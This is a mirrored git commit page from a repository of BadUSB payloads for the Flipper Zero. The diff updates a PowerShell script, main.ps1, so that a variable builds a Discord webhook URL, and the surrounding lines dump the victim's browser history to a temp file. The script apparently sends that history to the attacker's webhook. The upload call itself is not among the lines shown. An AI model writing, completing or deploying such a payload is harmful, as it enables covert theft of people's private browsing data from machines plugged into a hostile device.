mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-01-19 08:00:51 -08:00
Update main.ps1
This commit is contained in:
@@ -1,5 +1,5 @@
|
||||
|
||||
$whuri = "$dc"
|
||||
$whuri = ("https://discord.com/api/webhooks/" + "$dc")
|
||||
|
||||
$outpath = "$env:temp\browser_history.txt"
|
||||
"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII
|
||||
|
||||
Reference in New Issue
Block a user